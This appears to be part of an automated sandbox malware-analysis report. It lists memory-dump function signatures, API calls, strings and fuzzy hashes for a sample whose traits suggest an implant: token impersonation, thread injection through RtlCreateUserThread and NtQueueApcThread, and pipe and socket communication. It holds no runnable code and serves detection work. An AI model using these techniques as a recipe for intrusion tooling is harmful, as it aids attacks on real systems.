                                                                    • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno_errno
                                                                  • String ID:
                                                                  • API String ID: 2964073243-0
                                                                  • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                                                                  • Instruction ID: 9a5633fb553444a0838e3de5a66e580a6212c88d0cbfca2ea863417caaa9e619
                                                                  • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                                                                  • Instruction Fuzzy Hash: 26F02BB270060445EF097FA4C8A136C72539F51B32FA98306D9390B3D5E77D44D38712
                                                                  APIs
                                                                    • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                                                                  • strrchr.LIBCMT ref: 001B52ED
                                                                  • _snprintf.LIBCMT ref: 001B539B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintfmallocstrrchr
                                                                  • String ID: Failed to impersonate token: %d$t permissions in process: %d
                                                                  • API String ID: 3587327836-1492073275
                                                                  • Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                                                                  • Instruction ID: 352770fe634819318cdb85f5b69be49ea66c76f3b606d11a1e4ac64c4e353384
                                                                  • Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                                                                  • Instruction Fuzzy Hash: 1B41B135704A8096DB14FB22B9147AF6792B79AFD4F488125EE5A4BB69DF3CC442C700
                                                                  APIs
                                                                  • CreatePipe.KERNEL32 ref: 006728A3
                                                                  • GetStartupInfoA.KERNEL32 ref: 006728AD
                                                                  • Sleep.KERNEL32 ref: 006728F4
                                                                    • Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 006748F1
                                                                    • Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 00674932
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$CreateInfoPipeSleepStartup
                                                                  • String ID: h
                                                                  • API String ID: 1809008225-2439710439
                                                                  • Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                                                                  • Instruction ID: 9dac431128a5d33a1cca976349f8c7763e936ef93a065078d3ae7311692ea35b
                                                                  • Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                                                                  • Instruction Fuzzy Hash: CA419A32604B889AE750CF65E84078EB7B6F788798F504219EF9C53B68DF38D646CB40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AccountInformationLookupToken_snprintf
                                                                  • String ID: %s\%s
                                                                  • API String ID: 2107350476-4073750446
                                                                  • Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                                                                  • Instruction ID: 76ff5fb1b92f255e071d72172c76c5275d98a87628965d455dad0b8e360381d6
                                                                  • Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                                                                  • Instruction Fuzzy Hash: 2E213032204FC196EB24DF61E8547DA7369F788B88F448126EA8D57B18DF39C31AC740
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32 ref: 00688B8A
                                                                  • __crtCapturePreviousContext.LIBCMT ref: 00688BA1
                                                                  • __raise_securityfailure.LIBCMT ref: 00688C43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CaptureContextFeaturePresentPreviousProcessor__crt__raise_securityfailure
                                                                  • String ID: Pj
                                                                  • API String ID: 2585579334-1109624870
                                                                  • Opcode ID: fa3aebd98754aec5c2a36f7327a256f2afd717e403199b14b25e934204aebfe6
                                                                  • Instruction ID: e072f98f297580da6a0260de77f9bdce81e2c4c5eefec8c9f79deadb00f27ec1
                                                                  • Opcode Fuzzy Hash: fa3aebd98754aec5c2a36f7327a256f2afd717e403199b14b25e934204aebfe6
                                                                  • Instruction Fuzzy Hash: 68210775704B4085EB50AB18F86135477AAF78A348F90022AEA8D577B1EF7FC865CB01
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: RtlCreateUserThread$ntdll.dll
                                                                  • API String ID: 1646373207-2935400652
                                                                  • Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                                                                  • Instruction ID: 412f3c1fad01ec40b37c44b9036fff2b84c8986c87c1a8c8b4a2999c95763c34
                                                                  • Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                                                                  • Instruction Fuzzy Hash: BD016D32314B8192DB20CF11F894749B7A9FB88B80F998135EA9D43B14DF38C5A9C700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: NtQueueApcThread$ntdll
                                                                  • API String ID: 1646373207-1374908105
                                                                  • Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                                                                  • Instruction ID: f038d303a48577b73559bf0d1ae69cbde89ae8da4f8355f731266a35975aac91
                                                                  • Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                                                                  • Instruction Fuzzy Hash: E601D125300B9292DB008F22F85435AB3A5FB89FD0F988625EF5C43B28DF38C5A68300
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsWow64Process$kernel32
                                                                  • API String ID: 1646373207-3789238822
                                                                  • Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                                                                  • Instruction ID: e2daee7cb0072110a92526451e8d9e6f4daa953fa947003dfc671c17928fab38
                                                                  • Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                                                                  • Instruction Fuzzy Hash: ACE04FA172270292FE05CB55E8A47656366EB88B91F481010D94B4AB65EF3DC5A9C710
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                  • API String ID: 1646373207-3900151262
                                                                  • Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                                                                  • Instruction ID: 3879d7efb5108f01c7375b1c336d0e57c507da3620a91ff4996a8e67f594b482
                                                                  • Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                                                                  • Instruction Fuzzy Hash: 11D0A710752607A1FE089B91FC747A41356BB5AF40F4C1020891E0B720EE3DC1EDC350
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                  • API String ID: 1646373207-736604160
                                                                  • Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                                                                  • Instruction ID: 4cd60276b6661a869d07d975088d21ef58a001d1a22f5fda6036dc8d0c00d3b0
                                                                  • Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                                                                  • Instruction Fuzzy Hash: FBD0A710712607A1FE049BD1FC747A46356AB49F40F4C1021881E0A720EE3DC1EAC350
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                                  • Instruction ID: 9cd805be13f1b3885f796fd01702c1fa5e39bc59ddbb0bb5b327f8e09bdc8491
                                                                  • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                                  • Instruction Fuzzy Hash: D8519572605784CAE728CF19E9C57EC33A1F758B95F25412ADE1A4BBA1DB78C442CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                                  • Instruction ID: 6eaaa9ab1a844fe88417ef1eff5ff3034109cd015612bf2cdfcfbf95f85d5a18
                                                                  • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                                  • Instruction Fuzzy Hash: 0051BF32741640CAD714EF29E8853A833E2F769B64F24823DDA1A5B761CB3EC452CF91
                                                                  APIs
                                                                    • Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B262E
                                                                    • Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B264C
                                                                    • Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2664
                                                                    • Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2671
                                                                    • Part of subcall function 001B25F4: rand.LIBCMT ref: 001B273D
                                                                  • strchr.LIBCMT ref: 001B21D6
                                                                  • _snprintf.LIBCMT ref: 001B220C
                                                                    • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                                                                    • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                                                                  • _snprintf.LIBCMT ref: 001B2223
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                                                  • String ID: not create token: %d
                                                                  • API String ID: 1095232423-2272930512
                                                                  • Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                                                                  • Instruction ID: dd83be3cdc38468e2d72b40f691b647392f28cd9c647279351a05b32f2482063
                                                                  • Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                                                                  • Instruction Fuzzy Hash: 8441C066614EC091EA159F6ED1852E8B3B0FF98B95F085512DF8D67B20EF34D1B6C340
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 00674A45
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                  • htonl.WS2_32 ref: 00674A5B
                                                                    • Part of subcall function 00674C44: PeekNamedPipe.KERNEL32 ref: 00674C7C
                                                                  • WaitForSingleObject.KERNEL32 ref: 00674AB6
                                                                  • free.LIBCMT ref: 00674AF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                                                                  • String ID:
                                                                  • API String ID: 2495333179-0
                                                                  • Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                                                                  • Instruction ID: 4648d0429a6de1d140e44e85e96c72b2234793a88890e8b2bc710f0046024de4
                                                                  • Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                                                                  • Instruction Fuzzy Hash: 2321E13670064086DB64EF62E54876A73ABFB89B98F09C518DE5D0B71CEF38C891C748
                                                                  APIs
                                                                  • _time64.LIBCMT ref: 0067C254
                                                                    • Part of subcall function 0068145C: GetSystemTimeAsFileTime.KERNEL32 ref: 0068146A
                                                                    • Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454
                                                                  • malloc.LIBCMT ref: 0067C29C
                                                                  • strtok.LIBCMT ref: 0067C300
                                                                  • strtok.LIBCMT ref: 0067C311
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Timestrtok$FileSystem_getptd_time64malloc
                                                                  • String ID:
                                                                  • API String ID: 460628555-0
                                                                  • Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                                                                  • Instruction ID: 8085eb6fc398f76177e30c2a2fe397d02a9ce9bf3850a8c026e00e981c306913
                                                                  • Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                                                                  • Instruction Fuzzy Hash: 042124B6600B9481DB40DF91E08866D37AAF788FE4B06822AEF2E47742CF30C542C784
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CE9FC
                                                                    • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                                                                    • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                                                                    • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                                                                  • _errno.LIBCMT ref: 001CEA08
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 001CEA13
                                                                  • strchr.LIBCMT ref: 001CEA29
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                  • String ID:
                                                                  • API String ID: 4151157258-0
                                                                  • Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                                                                  • Instruction ID: df1a2f1e0fb05b95aa4e2a41103ac0155ce180c4fd263ffc718e7481fa4e2d62
                                                                  • Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                                                                  • Instruction Fuzzy Hash: 9C1122632083E489CB2596219050B3ABAD0F3B5FD5B1D812DEAD70BA45CB2CC541CB50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: clock
                                                                  • String ID:
                                                                  • API String ID: 3195780754-0
                                                                  • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                                  • Instruction ID: dba1a0da941d908dcf79781d7b2a93baaae24648750842988d629b3281201762
                                                                  • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                                  • Instruction Fuzzy Hash: 19114826A04748895732EEA6748052BF690FB9D390F190035FE4403205EB74C881CF41
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: clock
                                                                  • String ID:
                                                                  • API String ID: 3195780754-0
                                                                  • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                                  • Instruction ID: 24348d802dc2d1f08a0c155925a8388473e2b6d20b6d7e2de2e238697d943f74
                                                                  • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                                  • Instruction Fuzzy Hash: 04116632A04788599770EFA6A88156BF692FB8B3D0F1D0235EF944B705EA75CC82C740
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068F5FC
                                                                    • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                                                                    • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                                                                    • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                                                                  • _errno.LIBCMT ref: 0068F608
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0068F613
                                                                  • strchr.LIBCMT ref: 0068F629
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                  • String ID:
                                                                  • API String ID: 4151157258-0
                                                                  • Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                                                                  • Instruction ID: 57340b939f474d349f093d2e7be4e21bbf8914060297e7e2e26b8cd3160c6e13
                                                                  • Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                                                                  • Instruction Fuzzy Hash: E21104626082E481CB207B25905027EB7A2E785FE4B1C8339FBD64BB65FA6CC4C3C710
                                                                  APIs
                                                                  • accept.WS2_32 ref: 0067EF71
                                                                  • send.WS2_32 ref: 0067EFAF
                                                                  • send.WS2_32 ref: 0067EFC3
                                                                  • closesocket.WS2_32 ref: 0067EFD4
                                                                    • Part of subcall function 0067F098: closesocket.WS2_32 ref: 0067F0A4
                                                                    • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0AE
                                                                    • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0B7
                                                                    • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$closesocketsend$accept
                                                                  • String ID:
                                                                  • API String ID: 47150829-0
                                                                  • Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                                                                  • Instruction ID: cf58eb68758bca1531fd76496b1870bd21c618929383d594a1707bb9788da1b2
                                                                  • Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                                                                  • Instruction Fuzzy Hash: 7E012C7531494181DB549B36E965B292362E78DFF4F149211DE2A07F85CE3AC4958B40
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$NamedPeekPipeSleep
                                                                  • String ID:
                                                                  • API String ID: 1593283408-0
                                                                  • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                                                  • Instruction ID: 94c007245e2648addf3c19d2b24951ee6a5b039a2cf0f1d7f3946ca565b745a6
                                                                  • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                                                  • Instruction Fuzzy Hash: 24F0A432614E5192E7108B25F84431AA3A6F784B81F648160DB8E42E78DE79C4D18705
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$NamedPeekPipeSleep
                                                                  • String ID:
                                                                  • API String ID: 1593283408-0
                                                                  • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                                                  • Instruction ID: 731b81161f5110ee6af5e0396237b43d73dcf653e201295d023d5e07bafe4612
                                                                  • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                                                  • Instruction Fuzzy Hash: D7F0A432614A5192E7108B25F85431BB766F785B94F648120DB8D42F74DF3DC8918B04
                                                                  APIs
                                                                  • InitializeProcThreadAttributeList.KERNEL32 ref: 0067770E
                                                                  • GetProcessHeap.KERNEL32 ref: 00677714
                                                                  • HeapAlloc.KERNEL32 ref: 00677724
                                                                  • InitializeProcThreadAttributeList.KERNEL32 ref: 0067773F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1212816094-0
                                                                  • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                                                  • Instruction ID: f678ab742e7207cbd561e49493ae46e7ce0d9f2ae07cae3b3ba7a2ec787c370f
                                                                  • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                                                  • Instruction Fuzzy Hash: 65F0BB2672564192DB58CB75F45075A63A6EB8CB90F585436FB0F42B14DE3DC4958B00
                                                                  APIs
                                                                  • closesocket.WS2_32 ref: 0067F0A4
                                                                  • free.LIBCMT ref: 0067F0AE
                                                                    • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                                                                    • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                                                                    • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                                                                  • free.LIBCMT ref: 0067F0B7
                                                                  • free.LIBCMT ref: 0067F0C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                                                                  • String ID:
                                                                  • API String ID: 1525665891-0
                                                                  • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                                                  • Instruction ID: d39bbc40504ba38ceb802984a6386ecaa7359909dca3ee8dfc6d7303dc756805
                                                                  • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                                                  • Instruction Fuzzy Hash: 9ED09E2671844481DF54EFF2D8A663C1322E7D8F94F1440359E2E4B366CD64CD95C348
                                                                  Strings
                                                                  • Unknown pseudo relocation bit size %d., xrefs: 00402294
                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 0-395989641
                                                                  • Opcode ID: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
